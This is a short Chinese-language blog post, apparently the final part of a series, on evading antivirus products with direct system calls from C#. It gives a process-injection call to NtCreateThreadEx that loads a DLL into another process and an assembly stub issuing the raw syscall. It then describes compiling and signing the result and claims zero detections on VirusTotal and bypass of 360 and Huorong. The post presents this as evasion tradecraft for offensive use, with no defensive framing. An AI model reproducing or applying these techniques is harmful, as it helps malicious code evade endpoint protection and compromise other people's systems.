写在前面:
前两篇文章本着想分享技术、共同交流的目的来与大家分享,无奈,后台收到了大量的diss,如技术过旧、绕不过360等,对于这些东西,我只想引用90社区的话大体如下,技术无论高低,分享都是好的,总是有人需要的。
我们不是没有能过360的免杀,比如我们自用的ps混淆脚本依旧vt可以0杀。
只是所有都需要一个过程,本来是想以系列文章的方式与大家交流、分享,没想到会是这样。故本文为本系列的最后一篇。
本文介绍c#的系统调用来绕过AV。
以进程注入为例,核心代码如下:
调试得知,调用的api为NtCreateThreadEx,直接调用。
类似代码如下:
NtCreateThreadEx(&ThreadHandle, 0x1FFFFF, NULL, ProcessHandle, (LPTHREAD_START_ROUTINE)LoadLibraryAddress, DllFullPathBufferData, FALSE, NULL, NULL, NULL, NULL);
根据自身去进行修改。
除此之外将其改为.asm调用也可。
.code
NtCreateThreadEx PROC
mov r10,rcx
mov eax,00A5h
syscall
ret
NtCreateThreadEx ENDP
end
然后编译文件,并使用sign进行签名。
最后vt的查杀如下:
virscan查杀结果如下:
测试360、火绒可过,国外未测试。